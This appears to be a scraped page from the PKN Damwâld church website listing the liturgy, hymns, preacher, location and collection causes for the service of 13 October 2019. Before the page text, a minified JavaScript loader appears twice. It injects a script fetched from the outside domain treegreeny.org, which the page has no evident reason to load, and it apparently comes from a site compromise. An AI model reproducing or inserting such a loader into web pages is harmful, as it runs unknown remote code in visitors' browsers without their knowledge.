;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 13 oktober 2019 9:30 uur - PKN Damwâld
zondag 13 oktober 2019
09:30 uur

Kerkdienst zondag 13 oktober 2019 9:30 uur

Informatie

Voorganger:Ds. G.J. Otter
Organist:Foeke Wiegersma
Liturgie
Lied voor de dienst Psalm 146 : 1 en 4
Welkom
We zingen: Gezang 320 : 1 en 4
Stil Gebed, Votum en Groet
We zingen: Elb 262
Wetslezing .
We zingen: Psalm 119 : 5 en 40
Gebed
We lezen: Galaten 3 : 1 - 14
We zingen: Psalm 147 : 1 en 7
Preek .
We zingen: Gezang 326 : 1, 3 en 4
Dankzegging en voorbede
Collecte
Slotlied : Elb : 203 1, 2 en 3
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Rudolphstichting

De Rudolphstichting onderhoudt gezinshuizen en zorgwoningen in Jeugddorp De Glind. Daarnaast ontwikkelt zij projecten die de zorg voor uithuis geplaatste kinderen en jongeren verbeteren en vernieuwen. Herstel van het normale leven is hierbij uitgangspunt. Zodat deze jongeren alle kans krijgen om zich te richten op de toekomst.

Tweede collecte: Kerk
Uitganscollecte: Wereldvoedseldag

Werelddiaconaat: Wereldvoedseldag
Bendejongeren opgeleid tot topkok in Colombia
In de sloppenwijken van Bogotá houden drugsgeweld en zware criminaliteit jongeren volledig in de greep. Kerk in Actie brengt daar met een ambitieus project verandering in. In één van de gevaarlijkste wijken van de stad zijn een kookschool annex restaurant gestart. Zestig kansarme jongeren worden er opgeleid tot chef-kok en leren hoogwaardige en gezonde gerechten te bereiden met projecten van boeren uit de omgeving. Inmiddels is in de Colombiaanse stad Cali een tweede kookschool geopend. Op beide locaties leiden we in totaal 180 jongeren op. Collecteer mee en geef kwetsarme jongeren de kans van hun leven om niet in de criminaliteit te raken!